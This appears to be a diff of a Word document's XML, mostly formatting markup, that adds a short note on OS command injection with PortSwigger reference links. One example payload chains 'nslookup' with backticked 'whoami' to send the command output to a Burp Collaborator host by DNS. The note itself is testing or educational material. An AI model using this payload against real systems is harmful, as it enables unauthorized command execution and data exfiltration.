+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>eg.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:bookmarkStart w:id="2" w:name="__DdeLink__111_3889686513"/>
+      <w:bookmarkStart w:id="3" w:name="__DdeLink__106_3889686513"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&amp; nslookup </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>`whoami`.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">l9vxsiupgmtqhyfl2p4khtpk8be22r.burpcollaborator.net </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>&amp;</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Ref: https://portswigger.net/web-security/os-command-injection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId2">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
+            <w:b w:val="false"/>
+            <w:bCs/>
+            <w:i w:val="false"/>
+            <w:caps w:val="false"/>
+            <w:smallCaps w:val="false"/>
+            <w:strike w:val="false"/>
+            <w:dstrike w:val="false"/>
+            <w:color w:val="000000"/>
+            <w:spacing w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:u w:val="none"/>
+            <w:effect w:val="none"/>
+          </w:rPr>
+          <w:t>Find OS command injection vulnerabilities using Burp Suite's web vulnerability scanner</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId4">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+            <w:b w:val="false"/>
+            <w:bCs/>
+            <w:i w:val="false"/>
+            <w:caps w:val="false"/>
+            <w:smallCaps w:val="false"/>
+            <w:color w:val="000000"/>
+            <w:spacing w:val="0"/>
+            <w:sz w:val="22"/>
+          </w:rPr>
+          <w:t>https://portswigger.net/burp/vulnerability-scanner</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:after="150"/>
+        <w:ind w:left="0" w:hanging="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">More Detail: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
+          <w:b w:val="false"/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:caps w:val="false"/>
+          <w:smallCaps w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>https://portswigger.net/research/hunting-asynchronous-vulnerabilities</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -1635,6 +2398,127 @@
   <w:abstractNum w:abstractNumId="1">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
+      <w:pStyle w:val="Heading1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:pStyle w:val="Heading3"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:left="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
@@ -1769,7 +2653,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2">
+  <w:abstractNum w:abstractNumId="3">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -1796,7 +2680,6 @@
         </w:tabs>
         <w:ind w:left="1080" w:hanging="360"/>
       </w:pPr>
-      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="2">
       <w:start w:val="1"/>
@@ -1809,7 +2692,6 @@
         </w:tabs>
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
-      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="3">
       <w:start w:val="1"/>
@@ -1822,7 +2704,6 @@
         </w:tabs>
         <w:ind w:left="1800" w:hanging="360"/>
       </w:pPr>
-      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="4">
       <w:start w:val="1"/>
@@ -1835,7 +2716,6 @@
         </w:tabs>
         <w:ind w:left="2160" w:hanging="360"/>
       </w:pPr>
-      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="5">
       <w:start w:val="1"/>
@@ -1848,7 +2728,6 @@
         </w:tabs>
         <w:ind w:left="2520" w:hanging="360"/>
       </w:pPr>
-      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="6">
       <w:start w:val="1"/>
@@ -1861,7 +2740,6 @@
         </w:tabs>
         <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
-      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="7">
       <w:start w:val="1"/>
@@ -1874,7 +2752,6 @@
         </w:tabs>
         <w:ind w:left="3240" w:hanging="360"/>
       </w:pPr>
-      <w:rPr/>
     </w:lvl>
     <w:lvl w:ilvl="8">
       <w:start w:val="1"/>
@@ -1886,127 +2763,6 @@
           <w:tab w:val="num" w:pos="3600"/>
         </w:tabs>
         <w:ind w:left="3600" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr/>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3">
-    <w:lvl w:ilvl="0">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="none"/>
-      <w:suff w:val="nothing"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="0"/>
-        </w:tabs>
-        <w:ind w:left="0" w:hanging="0"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="none"/>
-      <w:suff w:val="nothing"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="0"/>
-        </w:tabs>
-        <w:ind w:left="0" w:hanging="0"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2">
-      <w:start w:val="1"/>
-      <w:pStyle w:val="Heading3"/>
-      <w:numFmt w:val="none"/>
-      <w:suff w:val="nothing"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="0"/>
-        </w:tabs>
-        <w:ind w:left="0" w:hanging="0"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="none"/>
-      <w:suff w:val="nothing"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="0"/>
-        </w:tabs>
-        <w:ind w:left="0" w:hanging="0"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="none"/>
-      <w:suff w:val="nothing"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="0"/>
-        </w:tabs>
-        <w:ind w:left="0" w:hanging="0"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="none"/>
-      <w:suff w:val="nothing"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="0"/>
-        </w:tabs>
-        <w:ind w:left="0" w:hanging="0"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="none"/>
-      <w:suff w:val="nothing"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="0"/>
-        </w:tabs>
-        <w:ind w:left="0" w:hanging="0"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="none"/>
-      <w:suff w:val="nothing"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="0"/>
-        </w:tabs>
-        <w:ind w:left="0" w:hanging="0"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="none"/>
-      <w:suff w:val="nothing"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="0"/>
-        </w:tabs>
-        <w:ind w:left="0" w:hanging="0"/>
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
@@ -2435,6 +3191,23 @@
       <w:lang w:val="en-IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading1">
+    <w:name w:val="Heading 1"/>
+    <w:basedOn w:val="Heading"/>
+    <w:next w:val="TextBody"/>
+    <w:qFormat/>
+    <w:pPr>
+      <w:spacing w:before="240" w:after="120"/>
+      <w:outlineLvl w:val="0"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="DejaVu Sans"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="48"/>
+      <w:szCs w:val="48"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="paragraph" w:styleId="Heading2">
     <w:name w:val="Heading 2"/>
     <w:basedOn w:val="Normal"/>
@@ -2461,6 +3234,10 @@
     <w:next w:val="TextBody"/>
     <w:qFormat/>
     <w:pPr>
+      <w:numPr>
+        <w:ilvl w:val="2"/>
+        <w:numId w:val="1"/>
+      </w:numPr>
       <w:spacing w:before="140" w:after="120"/>
       <w:outlineLvl w:val="2"/>
     </w:pPr>
